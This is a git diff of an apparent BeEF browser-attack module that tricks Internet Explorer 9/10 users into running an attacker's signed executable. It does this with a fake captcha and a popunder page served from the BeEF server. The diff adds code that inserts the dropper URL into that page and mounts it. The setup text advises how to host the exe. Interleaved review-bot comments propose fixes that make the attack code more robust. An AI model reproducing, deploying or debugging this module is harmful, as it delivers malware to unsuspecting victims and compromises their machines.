diff --git a/modules/social_engineering/ui_abuse_ie/command.js b/modules/social_engineering/ui_abuse_ie/command.js
index 7147fcace..a62d8a2f9 100644
--- a/modules/social_engineering/ui_abuse_ie/command.js
+++ b/modules/social_engineering/ui_abuse_ie/command.js
@@ -7,7 +7,7 @@ beef.execute(function() {
 if(beef.browser.isIE()){
- getLanguage = function(){
+ var getLanguage = function(){
 var lang = null;
 switch (beef.browser.getBrowserLanguage().substring(0,2)){
 case "en":
@@ -20,7 +20,7 @@ beef.execute(function() {
 return lang;
 };
- grayOut = function(vis, options) {
+ var grayOut = function(vis, options) {
 var options = options || {};
 var zindex = options.zindex || 50;
 var opacity = options.opacity || 70;
@@ -55,18 +55,21 @@ beef.execute(function() {
 }
 };
- spawnPopunder = function(){
- //TODO this will be replaced with a webpage served by BeEF
- var pu = window.open('popunder.html','','top=0, left=0,width=500,height=500');
+ function spawnPopunder(){
+ var url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/underpop.html'
+ var pu = window.open(url,'','top=0, left=0,width=500,height=500');
 pu.blur();
- };
+ }
 if(beef.browser.isIE9()){ // [TAB] + shortcut
- $(document.body).attr('onclick', 'spawnPopunder();');
+ document.body.onclick = function (){spawnPopunder();};
 }else if(beef.browser.isIE10()){ // just shortcut
- $(document.body).attr('onclick', 'spawnPopunder();');
+ document.body.onclick = function (){spawnPopunder();};
+ //TODO using TAB+R works delivering this via BeEF, but it should work without Tab too.
+ // Probably there are some issues with the popunder focus and blur
+ //setTimeout(function (){spawnPopunder();}, 1000);
 //TODO Using Gray-out, display the fake captcha with the 2 gifs (base64 the gif content and use dataURI inline image)
 }else{
diff --git a/modules/social_engineering/ui_abuse_ie/config.yaml b/modules/social_engineering/ui_abuse_ie/config.yaml
index aea5b2ed3..f5781deea 100644
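Review bot: In the third hunk, the new `var url = ... + '/underpop.html'` line inside spawnPopunder has no terminating semicolon and relies on automatic semicolon insertion, which the surrounding lines otherwise avoid; end it with `;`. On the next line `window.open` can return null when no window is created, so `pu.blur()` would throw a TypeError inside the click handler; guard it with `if (pu) { pu.blur(); }`. Declaring `spawnPopunder` as a function declaration inside the `if(beef.browser.isIE())` block is also inconsistent with the `var getLanguage`/`var grayOut` function expressions introduced by the first two hunks, and block-level function declarations have engine-dependent semantics in pre-ES2015 sloppy mode, so `var spawnPopunder = function(){ ... };` would keep the three uniform. The enclosing `beef.execute` callback starts and ends outside the hunk.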
--- a/modules/social_engineering/ui_abuse_ie/config.yaml
+++ b/modules/social_engineering/ui_abuse_ie/config.yaml
@@ -9,7 +9,7 @@ beef:
 enable: true
 category: "Social Engineering"
 name: "User Interface Abuse (IE 9/10)"
- description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
+ description: "This module is based on Rosario Valotta research (https://sites.google.com/site/tentacoloviola/). The executable to be run needs to be signed (best thing is signing it with Symantec EV-SSL). You can mount an exe in BeEF as per extensions/social_engineering/droppers/readme.txt. The victim is tricked to press [TAB]+R (IE 9) or simply R (IE 10), which are keyboard shortcuts for the modeless dialog option 'Run'. Depending on the browser language, the modeless dialog shortcuts are different. For example, R for English, E for Italian. In order to achieve such behavior, a fake captcha is displayed."
 authors: ["Rosario Valotta", "antisnatchor"]
 target:
 working: ["IE"]
diff --git a/modules/social_engineering/ui_abuse_ie/module.rb b/modules/social_engineering/ui_abuse_ie/module.rb
index 6fc52d4a1..8acce9332 100644
--- a/modules/social_engineering/ui_abuse_ie/module.rb
+++ b/modules/social_engineering/ui_abuse_ie/module.rb
@@ -12,11 +12,26 @@ class Ui_abuse_ie < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'dropper_url', 'ui_label' => 'Executable URL (must be signed)', 'value' => 'http://dropper_url/dropper.exe'}
+ {'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe'}
 ]
 end
- #TODO pre-execute -> read popunder.html, replace placeholder, and serve it mounting a new URL
+ def pre_send
+ begin
+
+ @datastore.each do |input|
+ if input['name'] == "exe_url"
+ @exe_url = input['value']
+ end
+ end
+
+ popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html")
+ body = popunder.gsub("__URL_PLACEHOLDER__", @exe_url)
+ BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html'}, body, "/underpop.html", -1) rescue Exception => e
+ print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}"
+ end
+ end
 def post_execute
 content = {}
diff --git a/modules/social_engineering/ui_abuse_ie/templates/popunder.html b/modules/social_engineering/ui_abuse_ie/popunder.html
similarity index 66%
rename from modules/social_engineering/ui_abuse_ie/templates/popunder.html
rename to modules/social_engineering/ui_abuse_ie/popunder.html
index fc4319318..a558e815e 100644
--- a/modules/social_engineering/ui_abuse_ie/templates/popunder.html
+++ b/modules/social_engineering/ui_abuse_ie/popunder.html
@@ -5,9 +5,9 @@
-
+
\ No newline at end of file
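Review bot: `rescue Exception => e` in the new pre_send catches everything, including Interrupt and SystemExit, and then only prints the message, so when the template cannot be read or `@exe_url` is nil (the option absent, making `gsub` raise TypeError) the module still proceeds and the command script later opens a `/underpop.html` that was never bound; narrow it to `rescue StandardError => e` and let the failure propagate or be reported as such rather than continuing silently. `popunder.gsub("__URL_PLACEHOLDER__", @exe_url)` uses the string-replacement form, in which `\1`, `\0` and `\\` sequences in the value are interpreted as backreferences; the block form `popunder.gsub("__URL_PLACEHOLDER__") { @exe_url }` inserts the value literally, and since the value is user-entered and lands in an HTML document whose placeholder context is not visible in this diff, it should also be HTML- or attribute-escaped for that context. The `@datastore.each` loop that only captures one field reads more directly as a `find` on `input['name'] == "exe_url"`. The enclosing class Ui_abuse_ie starts before the hunk and post_execute continues after it.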